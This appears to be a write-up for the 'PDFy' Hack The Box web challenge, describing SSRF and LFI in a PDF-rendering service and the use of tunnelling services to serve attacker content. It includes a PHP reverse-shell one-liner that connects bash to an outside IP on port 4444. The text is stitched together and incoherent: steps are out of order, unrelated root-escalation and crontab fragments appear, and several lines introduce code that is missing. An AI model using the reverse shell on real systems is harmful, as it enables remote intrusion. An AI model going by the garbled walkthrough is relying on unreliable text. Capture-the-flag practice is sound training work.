PDFy HTB Writeup Upd [2021]

This guide explains how to exploit the PDFy challenge on Hack The Box. This easy-rated web challenge features a vulnerable Server-Side Request Forgery (SSRF) vector paired with a Local File Inclusion (LFI) flaw in a PDF-rendering utility.

Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.

Start a local PHP server on your machine on port 80: sudo php -S 0.0.0.0:80

$ echo "<?php system('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'); ?>" > shell.pdf

Try to point the URL to http://localhost. If the server renders its own internal page, you have confirmed SSRF.

It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file.

Use SSRF to interact with this internal service:

With your external listener active and serving the exploit.php script, copy the public URL generated by your tunneling service (e.g., http://serveo.net). Paste your public URL into the input form. Click Submit.

To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.

Looking at the basic frontend JavaScript code, the application intercepts the form submission and passes the input URL via a POST request to an API endpoint (/api/cache):

However, because the PDFy interface only takes a URL rather than raw HTML input, we cannot type an tag directly into the input bar. The target server must query an external URL that we control.

3. The Exploitation Strategy: Redirection Bypass


add it to crontab

Alternatively, get a root shell:
